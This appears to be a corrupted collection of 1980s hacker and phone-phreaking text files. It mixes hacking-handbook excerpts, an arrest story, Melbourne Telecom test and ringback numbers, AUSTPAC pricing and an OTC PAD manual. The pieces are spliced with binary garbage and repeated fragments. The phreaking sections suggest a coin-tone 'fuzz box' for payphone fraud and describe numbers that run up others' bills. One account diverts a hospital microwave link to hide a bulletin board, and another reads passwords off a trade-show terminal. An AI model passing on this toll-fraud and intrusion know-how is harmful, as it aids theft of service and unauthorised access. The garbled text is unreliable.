rather than by different voltage conditions. Data traffic on a telex line can operate in only one direction at a time, but, by selecting differentX]ll, construct your own 'Charge call meter' and find out.. **NOTE** In the Box Hill area, where the new touch-tone lines have been installed, some other method is used to detect whether a call has been charged for or not, but this should work in most areas anyway. All you need is an old meter of some kind (doesn't really matter where from) and you connect one wire from each terminal of the meter to each of the two phone line wires. If you connect it up, and theS meter moves up full, then you have the polarity wrong, switch the wires around and try again.. If the phone does not work correctly with the meter connected, then you have a meter which has too much drain on the lines, try again with another meter. When you have it all going, then dial away. When the meter hits the right hand side of the dial, then you have been charged. To test it out, dial 6308 and watch the meter. It should look like a windshield wiper. **WARNING**F Don't do this for too long! It is expensive! (about $5 per minute!) the Box Hill area, where the new touch-tone lines have been installed, some other method is used to detect whether a call has been charged for or not, but this should work in most areas anyway. All you need is an old meter of some kind (doesn't really matter where from) and you connect one wire from each terminal of the meter to each of the two phone line wires. If you connect it up, and the&act that many interested installations still use yesterday's solutions. Getting one computer to talk to another some distance away means accepting a number of limiting factors: * Although computers can send out several bits of information at once, the ribbon cable necessary to do this is not economical at any great length, particulary if the information is to be sent out over a network - each wire in the ribbon would need switching seperately, thus making ex-changes prohibitiveely expensive. So bits must be transmitted one at a time, or serially. * Since you will be using, in the first instance, wires and network already installed - in the form of telephone and telex networks - you must accept that the limited bandwidth of these facilities will restrict the rate at which data can be sent. The data will pass through long lengths of wire, frequently being re-amplified, and undergoing degradation as it passes through dirty switches and relays in a multiplicitthe Washington Post article as it's available through other sources. Instead, a summary: In early July SH bought an AT&T 3B1 ("Unix PC") with a 67MB drive for a dirt-cheap $525. He got Sys V 3.5 for another $200 but was dissatisfied with much of the software they gave him (e.g. they gave him uucp version 1.1). When he was tagged by the feds, he had been downloading software (in the form of C sources) from various AT&T systems. According to reports, these included the Bell Labs installations at Naperville, Illinois and Murray Hill, New Jersey. Prosecutors said he also gained entry to (and downloades software from) AT&T systems at a NATO installation in Burlington, North Carolina and Robins AFB in Georgia. AT&T claims he stole $1 million worth of software. Some of it was unreleased software taken from the Bell Labs systems that was given hypothetical price tags by Bell Labs spokespersons. Agents took his 3B1, two Atari STs he had in his room, and several diskettes. SH is 17 and apparently will be treated as a minor. At the time of this writing, he will either be subject to federal prosecution for 'computer theft' or will be subject to prosecution only by the State of Illinois. SH's lawyer, Kaaren Plant, was quoted as saying that SH "categorically denies doing anything that he should not have been doing" and that he "had absolutely no sinister motives in terms of stealing property." As we said, he was jiy`ust collecting software for his new Unix PC. When I talked to Ms. Plant on September 25th, she told me that she had no idea if or when the U.S. Attorney would prosecute. Kaaren Plant can be reached at (312) 263-1355. her address is 134 North LaSalle, #306, Chicago, Illinois. --------- on July 9th SH wrote: So you see, I'm screwed. Oh yeah, even worse! In my infinate wisdom (stupidity, take your pick 8-)) I set up a local AT&T owned 7300E to call me up and send me their uuT icp files (my uucp works ok for receive) and guess what. I don't think I need to elaborate on THAT one... (holding my breath, so to type) (_>Sh<_ --- t' or will be subject to prosecution only by the State of Illinois. SH's lawyer, Kaaren Plant, was quoted as saying that SH "categorically denies doing anything that he should not have been doing" and that he "had absolutely no sinister motives in terms of stealing property." As we said, he was jZe modern 'human interface'; they are very likely to travel along paths intended, not for ordinary customers, but for engineers or salesmen; they could be utilising facilities that were part of a computer's commissioning process and have been hardly used since. So the hacker needs a greater knowledge of datacomms technology than does a more passive computer user, and some feeling for the history of technology is pretty essential, because of its growth pattern and because of the f,4not connected * 11657-11658 not connected 11659 keeps on ringing.. 11660 Penguin Vic 11661 Dial-a-record 11662-11663 not connected 11664 not connected * 11665 Maggi kitchen line 11666 Dial-it info 11667-11669 not connected 11670 Holiday line (for Queensland?) 11671 Leisure line 11672 Eyewitness news phone poll 11673-11675 not connected 11676 Eyewitness news phone poll 11677 Santa line 11678 not connected 11679 ЧZ New Zealand line 11680 Hoyts Drive in 11681 Entertainment hotline 11682 Medical information 11683-11685 not connected 11686 not connected * 11687 not connected 11688 3XY gig guide 11689-11692 not connected 11693 not connected * 11694-11695 not connected 11696 Wedding scene 11697-11699 not connected >>>>>>>>>>> An explanation <<<<<<<<<<< Now to explain some of my (cryptic?) notes. Any number marked 'operator' answers with 'Teleыcom, what number are you calling?'. If there are words in quotes, then that is what she said instead. 'not connected' is the usual message, but if it has a asterisk (*) after it, then it was a male voice (they are normally female voices). Now, onto some of the more exciting of these numbers. As you can see, Telecom actually does not hide much, but some of what is hidden is quite interesting. For example there is 0109 which gives a tone, then goes dead. When you tap the r-eceiver button, or dial a number, it repeats the tone. Very weird indeed! Now, how about the five million 'Eyewitness news poll' lines. I always thought they had only two or three! But more interesting is the 'Green phone tone info' number (11570). It goes though the different tones that a 'Green phone' (the type you put money into) makes.. very interesting.. you could probably use this info to build a 'fuzz box'. (a box which simulates the dropping of a coin, bӨy sending the right frequency out a speaker, which is held next to the mouthpiece of a 'Green phone'.. the exchange thinks you are putting money in.. hehe!) There are a few extra stock exchange numbers (11501, 11502 and 11616) but they don't really excite me. Now, for you astronomy fans, how about the 'Hailey's comet' line on 11613. Gives scientific info, and other such stuff. How come Telecom never told us about that one? eh? >>>>>>>>>>>> #8 exchanges <<<<<<<<<<<< Righet, you may be asking, what about those numbers I marked above with '<<<<< see below'? Well, if you dial those numbers, all you get is nothing, but it is my belief that they could (possibly) be loops! What I will have to do, is get my friends each to dial one, then see if anybody connects. If not, then these are just dud numbers. Note that some of these numbers are for recorded messages that are only activated during certain times.. Almost forgot two other tYXShings. The #8 numbers and the ringback numbers. #8 is LOTS of fun. When you dial it up, all you get a series of long beeps, but if you have a multimeter, or (like I had) an auto-answer unit connected to the line, you will notice that after each beep, the polarity of the line changes over. Now, at Telecom, when the polarity changes, you are charged for one metered call (ie: 16 cents). If you ring this number up, it costs you about $5 a minute! hehe! One Telecom} technician made the mistake of leaving it on once, over lunch (he was testing somebodies line) and this persons bill went up $300! hahaha! The numbers listed as #8 are most likely these sort of numbers (I didn't hang about long to find out), but I have two numbers which are definate #8 numbers. They are: 8008 For Balwyn area 6308 Should work for all Melbourne >>>>>>>>>> Ringback numbers <<<<<<<<<< Right, then there are ringbaכw{ck numbers. These are numbers which you dial, and then hang up, and they ring you back. Most of the ringback numbers listed will not work. Some are only for certain areas, others are not properly connected. The numbers I have which do work, are: 8000 For Balwyn area 859899 For North Balwyn 199 For Doncaster/Templestowe area 2200 For ?? area Note that 199 is the most common. If you live in an area oxYther than the above listed, then try that one, or 2200 (if you are desperate.. don't know what areas for that one) Another ringback number I have is a bit different. When it rings you back, rather then getting "ring-ring, pause, ring- ring", etc, it just keeps ringing "riiiiiiiinnnnnggg". It never stops until you answer!! hehe!! 8007 For Balwyn area Note that most ringback numbers give a low purring type noise when you dial them, wait a second or two, þqthen hang up. When you answer the phone (after it rings) you get a tone until you hang up. On 8007, however, after dialling there is nothing, and when you answer the phone (after it rings) there is also nothing. >>>>>>>>> Charge call meters <<<<<<<<< Charge call meters are used to detect whether or not you are being charged for a call. Ever been told about a number by a friend, 'Oh yes, it's free, call it up all the time..' and never known whether it WAS free or not? We? On the converse side, I and many hackers I know are convinced of one thing: we receive more than a little help from the system managers of the computers we attack. In the case of computers owned by universities and polys, there is little doubt that a number of them are viewed like academic libraries - strictly speaking they are for the student population, but if an outsider seriously thirsty for knowledge shows up, they aren't turned away. As for other computers, a number of use arۓe almost sure we have been used as a cheap means to test a system's defences ... someone releases a phone number and low-level password to hackers (there are plenty of ways) and watches what happens over the next few weeks while the computer files themselves are empty of sensitive data. Then, when the results have been noted, the phone numbers and passwords are changed, the security improved etc etc .... much easier on dp bugets than employing programmers at 150 pound /man/day or morle. Certainly the Pentagon has been known to form 'Tiger Units' of US Army computer specialists to pin-point weaknesses in systems security. Two spectacular hacks of recent years have captured the public imagination: the first, the Great Prince Philip Prestel Hack, is described in detail in chapter 8, which deals with viewdata. The second was spectacular because it was carried out on television. It occurred on October 2nd 1983 during a follow-up to the BBC's sucessful Computer LiIteracy series. It's worth reporting here, because it neatly illustrates the essence of hacking as a sport ... skill with systems, careful research, maximun impact with minimum real harm, and humour. The tv presenter, John Coll, was trying to show off the Telecom Gold electronic mail service. Coll had hitherto never liked long passwords and, in the context of the tight timing and pressures of live tv, a two letter password seemed a good idea at the time. On Telecom Gold, it is on.Gly the password that is truely confidental; system account numbers, as well as phone numbers to log on to the system, are easily obtainable. The BBC's account number, extensively published, was OWL001, the owl being the 'logo' for the tv series as well as the BBC computer. The hacker, who appeared on a subsequent programme as a 'former hacker' and who talked about his activities in general, but did not openly acknowledge his responsibility for the BBC act, managed to SEIZE contrD2{)ol of Coll's mailbox and superimpose a message of his own. Computer Security Error. Illegal access. I hope your television PROGRAMME runs as smoothly as my PROGRAM worked out your password! Nothing is secure! Hackers' Song 'Put another password in, Bomb it out and try again Try to get past logging in, We're hacking, hacking hacking Try his first wife's maiden name, This is more than just a game, It's real fun, but just the same, It's hacking, hacking, 2hacking" The Nutcraker (hackers UK) ------------------------- Hi There, Owlets, from Oz and Yug (Oliver and Guy) After the hack a number of stories about how it had been carried out, and by whom, circulated; it was suggested that the hackers had crashed through to the operating system of the Prime computers upon which the Dialcom electronic mail software resided - it was also suggested that the BBC had arranged the whole thing as a stunt, or alternatively, that nsome BBC employees had fixed it up without telling their colleagues. Getting to the truth of a legend in such cases is almost always impossible. No one involved has a stake in the truth. British Telecom, with a strong commitment to get Gold accepted in the business community, was anxiouns to suggest that only the dirtiest of dirty tricks could remove the inherent confidentially of their electronic mail service. Naturally, the British Broadcasting Corporation rejected any possibility gthat it would connive in an irresponsible cheap stunt. But the hacker had no great stake in the truth either - he had sources and contacts to protect, and his image in the hacker community to blster. Never expect ANY hacking anecdote to be completely truthful (RAD: I agree with that!!) ---- End of Chapter 1 ---- ronic mail software resided - it was also suggested that the BBC had arranged the whole thing as a stunt, or alternatively, that  dwot connected 11599 Disco hotline 11600 Riceline 11601-11607 ringback 11608 #8 11609 Defence force 11610 Dial for new help 11611 Dial-a-prayer 11612 Bible readings 11613 Hailey's comet 11614 Childrens stories 11615 not connected * 11616 Share market 11617-11620 not connected 11621 not connected * 11622 Cash and card 11623-11624 not connected 11625 Investment news 11626 Eyewitness news phone poll  Ώ,11627 not connected * 11628 Eyewitness news phone poll 11629 Life be in it 11630 Stereo AM 11631 <<<<< see below 11632 <<<<< see below 11633 out of order 11634 not connected 11635 Dial-a-horoscope 11636-11637 not connected 11638 Holiday travel line 11639-11642 not connected 11643 EON-FM Live wire 11644-11649 not connected 11650 Tel-law 11651 not connected 11652 Home security 11653-11655 not connected 11656 (.ackers skipped out their own local computers, along packet-switched high grade communications lines, and into the other machines on the net. But all these hackers were privileged individuals. They were at a university or research resource, and they were able to borrow terminals to work with. What has changed now, of course, is the wide availability of home computers and the modems to go with them, the growth of public-access networking of computers, and the enormous quantities a nd variety of computers that can be accessed. Hackers vary considerably in their native computer skills; a basic knowledge of how data is help on computers and can be transferred from one to another is essential. Determination, alertness, opportunism, the ability to analyse and systhesise, the collection of relevant helpful data and luck - the pre-requisites of any intelligence officer - are all equally important. If you can write quick effective programs in either a high level  phrack.16.121gphrack.16.2*phrack.16.3*phrack.16.4phrack.16.5phrack.16.6%phrack.16.7 phrack.16.8 Vphrack.16.9 phrack18.1r 7eut is up, and we are on the air. Results- Very good line, no noise, can be converted t3 ) $K $ $-,X]2 card for a modest fee if I want the bandwidth. So thats the story of how the board went to a "Friendly foreign country" The Mad Phone-man plot thickens. I've got a sattelite office for a business near the hospital on the other side, I quickly call up good ole Bell Canada, and have them run a 2 wire line from the equipment room to my office, Now the only thing to get |m8ns in the these circumstances, difficulty in logging on first time. He was using one of those sets that displays auto-dialled telephone numbers; that was how I found the number to call. By the time he had finished his third and unsucessful log-on attempt I (and presumably several others) had all the pass numbers. While the BT staff were were busy with other visitors to their stand, I picked out for myself a relatively neglected viewdata set. I knew that it was possible to by-pass theCL auto-dialler with it's pre-programmed phone numbers in this particular model, simply by picking up the phone adjacent to it, dialling the prefered number, waiting for the whistle, and then hitting the button labeled 'viewdata'. I dialled Holland, performed my little by-pass trick and watched Viditel write itself of the screen. The pass numbers were accepted first time and, courtesy of .... no, I'll spare them embarrasment ... I had only lack of fluency in Dutch that restrained me f{rom my explorations. Fortunately, the first BT executive to spot what I had done was amused as well. Most hackers seem yo have started in a similar way. Essentially you rely on the foolishness and inadequate sense of security of computer salesman, operators, programmers and designers. In the introduction to this book I described hacking as a sport; and like most sports, its is both I relatively pointless and filled with rules, written or otherwise, which have to be obeyed i]f there is to be any meaningfulness to it. Just as rugby football is not only about forcing a ball down one end of a field, so hacking is not just about using any means to secure access to a computer. On this basis, opening private correspondence to secure a password on a public access service like Prestel and then running around the system building up someones bill, is not what hackers call hacking. The critical element (RAD: No, not the Random element!! hehe) must be the use of the skills in some shape or form. Hacking is not a new pursuit. It started in the early 1960's when the first 'serious' time-share computers began to appear at university sites. Very early on, 'unoffical' areas pf the memory started to appearm first as mere noticeboards and scratchpads for private programming experiments, then, as locations for games. (Where, and how do you think the early Space Invaders, Lunar Landers and Adventure Games were created?) Perhaps tech-hacking - Ksthe mischevous manipulation of technology - goes back even further. One of the old favourites of US campus life was to re-wire the control panels of elevators (lifts) in the high-rise buildings, so that a request for the third floor resulted in the occupants being whized to the twenty-third. Towards the end of the 60's, when the first experimental networks arrived on the scene (particularly when the legendary ARPAnet - Advanced Research Agency network - opened up), the computer hIqheres a better way....Move it! But where? Where's safe from the PhBI? Well in the old days, to escape the draft, you went to canada, why not ex-patrate my board.... well the costs of a line are very high, lets see whats available elsewhere. One afternoon, Im working at a local hospital, (one I do telecom work for) and I ask the comm mgr if they have any links to Canada? He says why yes, we have an inter-medical link over a 23ghz microwave into the city just across the border.^ I ask to see the equipment. WOW! My dreams come true, its a D4 bank (Rockwell) and its only got 4 channel cards in it. Now, being a "Nice" guy, I offer to do maintainence on this equipment if he would let me put up another channel...he agrees. The plot thickens. I've got a sattelite office for a business near the hospital on the other side, I quickly call up good ole Bell Canada, and have them run a 2 wire line from the equipment room to my office, Now the only thing to get 84fis a couple of cards to plug i the MUX to put me on the air. A 2 wire E&M card goes for bout $319. and Id need two, I look around the state, and find one bad one in Rochester.... I'm on my way that afternoon via motorcycle, the card is mine, and the only thing I can find wrong is a bad voltage regulator. I stop by the Rockwell office in suburban Rochester and exchange the card, while I'm there, I buy a second one (Yeah, on my card) and drive home.... by 9pm that nite the circ#?ter (Character Stop) indication. Character-Mode Terminal ======================= A terminal which receives and transmits characters one after another in the stop start mode. AUSTPAC supports character mode terminals using the IA5 code. Low Speed Computer Port (LSCP) ============================== An access line to a computer or front-end processor requiring up to 8 asynchronous network access lines operating at the same data rate and with one network address. Low speed computer ports5cz may not be used for outgoing AUSTPAC calls. Network User Identifier (NUI) ============================= Use for security, accounting and network information purposes. A NUI is only submitted by a character mode terminal (X.28) gaining access to AUSTPAC via the PSTN. Packet-Mode Terminal ==================== A data terminal equipment which can control and format packets, and transmit and receive packets. Permanent Virtual Circuit (PVC) =============================== A user facility,2 in which a permanent association exists between two terminals, that is identical to the data transfer phase of a virtual call. Private Port ============ Public Switched Telephone Network (PSTN) access other than by common AUSTPAC access numbers. Calls to private ports may result in a virtual call being set up automatically to the preregistered address of the Private Port `owner`. PSTN ==== Public Switched Telephone Network. Synchronous Transmission ======================== In this t/xype of transmission, process synchronisation is maintained, i.e. the receiver is kept continuously in step with the transmitter throughout the transmission by electronic clocking devices. Virtual Call ============ A user facility in which a call set-up procedure and a call clearing procedure will determine a period of communication between two terminals in which user's data will be transferred through the network in the packet mode of operation. All the user's data is delivered from }I_Lthe network in the same order in which it is received by the network. ----------------------------------------------------------------------------- GREAT TITLES FROM -=- THE APPLE ODESSA -=- INCLUDE: ----------------------------------------------------------------------------- Test Drive Leisure Suit Larry Into the Eagle's Nest Maniac Mansion World Games Aliens Paper Boy Where in Europe Pira]Wtes Ultima V Xevious California Games Indoor Sports Print Magic Gauntlet Kid Niki Radical Ninja 2400 A.D. Legacy of the Ancients 8/16 Paint Marble Madness Accolade's Comics Animate Publish It! Destroyer World Class LeaderBoard LB Famous Courses #1 PHM Pegasus Multiscribe V3.0 Certificate Maker Hard Ball  \F Ikari Warriors L.A. Crackdown Rad Warrior Space Quest I Space Quest II Wasteland Sub Battle Force 7 The Works! SpiderBot Roadwar Europa Tomahawk Boulder Dash Con Kit Home Video Producer ----------------------------------------------------------------------------- World Games Aliens Paper Boy Where in Europe Piramw14ce.file.2w15ce.file.3t16ce.file.4o17ny.us.nos globe5.1off|globe5.2xtvhack.vax.vms-hackat&thacker.ethicshacker.notes.11hacker.notes.2@~hacker.notes.3 intro.1w lockpici midas.part1midas.part2minerva.cmdsaminerva.info minerva.tips number.txto otc.data.access6pacific.islandkpart1*.*ipsDpart2.bewPpart2a16.12part3.endA: phrack.16.1phrack.16.10phrack.16.11 >phrack.16.121gphrack.16.2*phrack.16.3*phrack.16.4phrack.16.5phrack.16.6%phrack.16.7 phrack.16.8 Vphrack.16.9 phrack18.1rߔ phrack18.2phrack18.3;,phrack18.4>phrack18.54phrack18.6p-ophrack18.7esmphreak.11|phreak.bewplease.read.merip.atms.offdttcppbtc7tv-zipp.txtQutcc.c_^---------------------------------------------------------------------------| | o Reverse Charge Acceptance 13 - | |---------------------------------------------------------------------------| | o Direct Call 13 - | |---------------------------------------------------------------------------| | o Logical Channels | | (Logical channels number 1 | | or any PVC exceptance) | | (i) Each SVC logical channel | | numbered 2, 3, 4, or 5 13 2.50 | |(ii) Each SVC logical channel | | numbered 6 or greater 13 11.00 | |----------------------------------------s-----------------------------------| | o Permanent Virtual Circuit | | (i) Each end 13 - | |(ii) Chargeable one end only - 90.00 | | (Connect time charges | | do not apply) | ------------------------------------------------------------- ---------------- NOTES: There is no charge for a call attempt if failure is due to the network. Calls that are chargeable incur a minimum volume charge of 20 segments (50 segments if Fast Select) and appropriate duration charges. (i) Rates: Standard rates apply to volume and duration between 8am and 6pm, Monday to Friday. Off-peak rates apply at other times and National Public Holidays. (ii) Traffic volume is expressed in terms of kilosegments. A segment con tains up to 64 octets (1 octet equals 8 bits). A packet (1024 bit max.) contains 1 segment (0-64 octets) or 2 segments (65-128 octets). A kilosegment, therefore, may be up to 512,000 bits. (iii) Acceptance of a user application for inclusion in a Close User Group is dependent on consent being given by the `owner` of the Group. (iv) Logical Channels (LC) and PVCs are numbered in sequence whereby PVCs, if any, have the lowest numbers in the sequence comme o\ncing at number 1. (eg. PVC#1, PVC#2, LC#3, LC#4). CALCULATION OF USAGE CHARGES ---------------------------- Costs are calculated by converting an average call into its component elements and applying typical volume and connect time allowances for each element. The component elements of some typical calls are listed below: TABLE OF TYPICAL APPLICATIONS AND TRANSACTIONS ----------------------------------------------------------------------------- Application  q Transaction Segment Time/Sec ----------------------------------------------------------------------------- Enquiry/ Retrieve 1 record 4 8 Response Amend retrieved record 4 20 Create 1 record 8 30 ----------------------------------------------------------------------------- Bibliographic Log-on to database  / 4 10 Database Load and conduct 1 search 2 60 Review citations (each) 8 20 Obtain abstract (each) 18 60 ----------------------------------------------------------------------------- Bureaux Log-on to bureax 4 15 Services Log-on to application 4 10  & Data entry (per 1000ch) 25 300 Data output (per 1000ch) 20 40 ----------------------------------------------------------------------------- Private Videotex Log-on 10 15 (Not Viatel) Call up 1 page 12 15 ----------------------------------------------------------------------------- Communicating Call set-up nk 4 15 WPs Text Transmission (2000ch) 36 10 ----------------------------------------------------------------------------- Electronic Mail Log-on to mailbox 4 15 Review message headers 4 15 Read 1 item (500ch) 12 30 Send 1 item (500ch) 16 180 ------------------pd ----------------------------------------------------------- Electronic Fund Transfer (EFT) 1 transaction only 4 20 ----------------------------------------------------------------------------- GLOSSARY OF TERMS ----------------- Asynchronous Transmission (Start/Stop) ====================================== In an asynchronous transmission system each character is preceded by a start bit and concluded by one or more stop bits acting as an end of characharges are made up of three seperate components: o An ACCESS charge which in the case of dedicated access includes the provision of a Modem/Network Terminating Unit (NTU) and line. This charge is independent of the distance between your terminal and the nearest entry point into the packet switched network. o A USAGE charge which is distance independent. o An additional/optional FACILITIES charge. ----------------- }B ------------------ | DEDICATED | -------------> OR <--------------- | DIAL UP | | ACCESS | || | ACCESS | | (1) | || | (2) | ----------------- || ------------------ PLUS || \||/ \/  ------------------------- | USAGE | | Volume & Connect time | | (3) | ------------------------- || || PLUS || \||/ \/ ------------------------- | ADDITIONAL/OPTIONAL | | FACILITIES | | (4) | ------------------------- 1.DEDICATED ACCESS ------------------ Installation (Once Only Charge) ----------------------------------------------------------------------------- | | Up to | 1200 | Low Speed | 2400 | 4800 | 9600 | 19200 | 48000 | | Bit/s | 300 asyn| asyn |Computer Port| syz2n. | syn. | syn. | syn. | syn. | |-------|---------|------|-------------|------|------|------|-------|-------| | $ | 400 | 460 | 550 | 1000 | 1000 | 1000 | 1000 | 2000 | ----------------------------------------------------------------------------- RENTAL (Including Modem/NTU and line) ----------------------------------------------------------------------------- | | Up to | 1200 | Low Speed | 2400 | 4800 | 9600 | 19200 | 48000 | | Bit/s | 300 asyn| asyn  ?V|Computer Port| syn. | syn. | syn. | syn. | syn. | |-------|---------|------|-------------|------|------|------|-------|-------| |$/Month| 200 | 220 | 240 | 275 | 410 | 605 | 850 | 1330 | ----------------------------------------------------------------------------- * Special conditions apply to 19200 bit/s access. 2.DIAL UP ACCESS (Via PSTN) --------------------------- ----------------------------------------------------------------------------- | DATEL EXCHANG dE LINE (DXL) | Standard DXL charges apply | ----------------------------------------------------------------------------- Installation/Registration Monthly Once Only Rental $ $ ----------------------------------------------------------------------------- | |  AM|(For each state)4.50| | NETWORK USER IDENTIFIER (NUI) | 55 | (Maximum) 22.50 | |--------------------------------|---------------------|--------------------| | PRIVATE PORT (up to 1200 bits) | 550/port | 240/port | ----------------------------------------------------------------------------- 3.USAGE (Volume and Connect Time) --------------------------------- --------------------------------------------------------  W+ | Volume charge per Kilosegment | Connect time per hr | |--------------------------------|---------------------| | Standard | Off-peak | Standard | Off-peak | ---------------------|----------------|---------------|----------|----------| | DEDICATED ACCESS | $1.10 | 55 cents | 36 cents | 3.6 cents| |--------------------|----------------|---------------|----------|----------| | DIAL UP ACCESS |  s h $1.10 | 55 cents | $4 + call| $1.50 | ----------------------------------------------------------------------------- 4.ADDITIONAL/OPTIONAL FACILITIES -------------------------------- ----------------------------------------------------------------------------- | OPTIONAL FACILITIES CHARGES | |---------------------------------------------------------------------------| | Reg or Facility charge Rental | | Facility $ (Once Only) ($/month)| |---------------------------------------------------------------------------| | o Closed User Group | | (each terminal per CUG) 13 1.10 | |---------------------------------------------------------------------------| | o Fast Select Acceptance 13 - | |Ӛ15 18 = 18 ) is set to zero. STANDARD PAD PROFILES --------------------- par PROFILE NUMBER num 01 02 03 04 05 06 07 08 09 10 11 12 ---+-------------------------------------------------- 01 00 01 -- 01 -- 01 01 -- 01 -- 01 01 02 00 01 -- 01 -- 00 00 -- 01 -- 01 01 03 00 126 -- 02 -- 02 02 -- 126 -- 02 02 04 04 00 -- 00 -- 00 00 -- 10 -- 00 00 05 00 01 -- 02 -- 02 02 -- 00 -- 02 02 06 00v4" 01 -- 13 -- 13 13 -- 01 -- 13 13 07 02 02 -- 21 -- 21 21 -- 21 -- 21 21 08 00 00 -- 00 -- 00 00 -- 00 -- 00 00 09 00 00 -- 00 -- 00 07 -- 00 -- 00 00 10 00 00 -- 00 -- 00 00 -- 00 -- 00 00 11 12 12 -- 12 -- 12 12 -- 12 -- 12 12 12 00 01 -- 01 -- 01 01 -- 01 -- 01 01 13 00 00 -- 04 -- 00 00 -- 00 -- 00 04 14 00 00 -- 00 -- 00 00 -- 00 -- 00 00 15 00 00 -- 00 -- 00&y 00 -- 00 -- 00 00 16 127 127 -- 127 -- 127 127 -- 127 -- 127 127 17 24 24 -- 24 -- 24 24 -- 24 -- 24 24 18 18 18 -- 18 -- 18 18 -- 18 -- 18 18 ------------------------------------------------------ GENERAL SERVICE SIGNALS ----------------------- The OTC Data Access Service provides important information to the user - esp. in the event of problems occuring within the packet-switching network. * (asteisk) the asterisk prompt indicates that0 the PAD is in the command mode, ie: commands may be issued, parameters and profiles changed, or a call may be placed. COM Call has been connected. ERR An error has been made in a PAD command. ENGAGED In response to STAT command, it advises that you are (logically) connected to a host. FREE In response to STAT command, it advises that terminal is  > free to make a new call. PAR In response to PAR? or SET? it gives the parameter number/s and present value/s. Call Statistics =============== CID: The call Identification number. DUR: The duration of the call. SEGS RX: The number of segments recieved. SEGS TX: The number of segments transmitted. RESET SIGNALS ============= A reset indicator shows that the logical connection between you and the ho!cUist has been interrupted and restored - but there might have been a loss of data. RESET DER Network error problem. RESET DTE Problem with the remote host. RESET ERR Local procedure error. RESET NC Network congestion problem. RESET PAR Reset initiated by PAD parameter. RESET RDO Error in remote host operations. RESET RPE Procedural error by remote host. CLEAR SIGNALS ============= If you wish to re-establish your li"=nk after a clear indicator, you will need to call again. CLR CONF PAD acknowledgement to your clear command. CLR DER The number you called is out of order. CLR DTE The remote host has cleared the call. CLR ERR Procedural error caused by your terminal. CLR INV Invalid request - facility not available. CLR NA The number called is not available to you. CLR NC Network congestion or temporary fault. CLR #1:NP Called number not valid - Check number. CLR OCC Number id busy - Try again later. CLR PAD The remote host has commanded OTC Data Access PAD to clear the call. CLR RPE Remote procedure error probably by the host. Note: If problems persist, take note of any diagnostic codes and pass them onto the Fault Reporting Centre (02) 218 4825 or (02) 218 4826 Telex AA01051 Account representatives: Toll-Free (008) 25 1139 or T Sydney (02) 287 3000 OTC Data Access Simulator: (02) 211 2850 give it a try to see how it all works!! [Ed: I hope this sorts out any problems anyone might be having/or have had with the new OTC Data Access system. I'll be getting the Advanced Users Manual soon, so I'll type it up and put it up. Errors and Omisions Accepted. The Buzzard] ility not available. CLR NA The number called is not available to you. CLR NC Network congestion or temporary fault. CLR %/dTPAC data service which uses packet switching techniques has been introduced by Telecom to meet the needs of customers who may have the following computer networking requirements: o the transmission of small volumes of data. o data communication over long distances. o infrequent data transfer or o the need for a switching capability between different terminals and/or data bases. This file outlines the component prices of AUSTPAC which will enqaY"able you to determine the costs you would incur when using this service. To assist you in understanding the AUSTPAC service and its facilities, we recommend that this pricing file is read in conjunction with the following Telecom publications which are freely available from your Capital City Data Office: (Files Comming Soon) o AUSTPAC GENERAL INFORMATION BROCHURE. and o AUSTPAC FACILITIES BOOKLET. AUSTPAC charging principles --------------------------- AUSTPAC c '1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Parameter change Commands (at the '*' prompt) PAD COMMAND FUNCTION INDICATORS ---------------------------------------------------------------------------- PAR?n to see the values of specified PARn:v PAR?n.m parameters. PARn:v,m:w PAR? (lists all) SET?n:v  (ѝf to change the values of PARn:v SET?n:v,m:w various parameters (n & m) to PARn:v,m:w new values (v & w) ---------------------------------------------------------------------------- PAD PARAMETERS -------------- The PAD acts as a translator of data standards between your terminal and the packet-switching network. There are 18 parameters in the OTC Data Access PAD and each can be set to various values. Parameters are referenced )bO by number, and each parameter can hold a value between 0 and 255, although in most, the choice is more restricted. NO. PARAMETER FUNCTION ---+------------------------------------------------------------------------- 1 PAD recall control - determines wether the user can switch to the command mode from the data mode. 2 ECHO - switches ON or OFF the echo function. 3 Data Trigger - defines what sends the packet on its way. 4 Automatic Trigger Timer - controls the delay b *n܋efore a packet is auto- matically dispatched. 5 Allows the PAD to flow-control data from the users terminal by using XON/ XOFF. 6 Service Signals - sets operation of signals from the PAD to your terminal. 7 Break Procedure - determines what happens if you hit the break key. 8 Buffer flushing - discards data in the PAD buffer. 9 Carriage return padding - sets the delay needed by printers to allow time for print head repositioning. 10 Line Folding - sets number o+|k~f characters in a line before a line-feed occurs. 11 Access line speed - indicates speed of internal link between PAD and OTC's modem. 12 Determines wether or not the PAD can be flow-controlled by the user via XON/XOFF. 13 Line-feed/Carriage-return - sets wether the system supplies a line-feed after a carriage-return. 14 Line-feed padding - sets a delay needed by some systems after a line-feed. 15 Edit Control - allows editing of current line before packet is di,OCspatched. 16 Delete Key - sets key used to delete a single character. 17 Line-Delete Key - sets key used to delete a line. 18 Line Display Key - sets key used to display the current line for editing. Note: see advanced users manual for details of selectable values for these parameters. There are currently 8 profiles available to you. The list and chart below give the most common usage of the various profiles and the parameter default values set for each. PROFILE DESCRIPTIO-I yN --------+--------------------------------------------------------------------- 1 sets the PAD for transparency on (02)20992 2 a CCITT standard 3 (reserved) 4 standard default profile used on both dial-up numbers. 5 (reserved) 6 same as 4 except it has no echo; suitable for half duplex 7 for older style printer terminals, with a limited alility to buffer. 8 (reserved) 9 videotext applications 10 (reserved.do) 11 alternate to profile 4; without automatic line feed insertion. 12 same as 4, except PAD echo control cannot be turned off by the host. --------+--------------------------------------------------------------------- STANDARD DEFAULT PROFILE ------------------------ The default profile for both phone numbers is profile 4. Allprofiles have 18 parameters - each of which is set to a value which controls a PAD function. PROFILE 4 1 = 1 sets P to swpa from data/J1 to command mode. 2 = 1 keyed characters will be echoed back to user and appear on the screen (full duplex) 3 = 2 After every 128 characters or a carriage return, data is transmitted as a packet. 4 = 0 There is no automatic transmission of data after a certain time period. 5 = 2 Sets flow-control of data from terminal. Without this, data could be lost. 6 = 13 Enables the display of the '*' prompt, date/time, and call stats. 0.7 = 21 Sets the operation of the BREAK key to interrupt the host and to discard any data currently in transit from the host. 8 = 0 Sets the normal flow of data from the host to the users terminal. 9 = 0 No delay is inserted after a carriage return. Printer terminal users see profile 7. 10 = 0 No carriage-return or line-feed characters are added by the local PAD 11 = 12 Not accessable to the user. 12 = 1 The value defines the flow-control between p)the PAD and Data Access' own internal modem. 13 = 4 Adds a line feed after each carriage-return on echoed data only to provide 'normal' line scrolling. 14 = 0 No delay after a line-feed character in data from the host, or echoed back from the 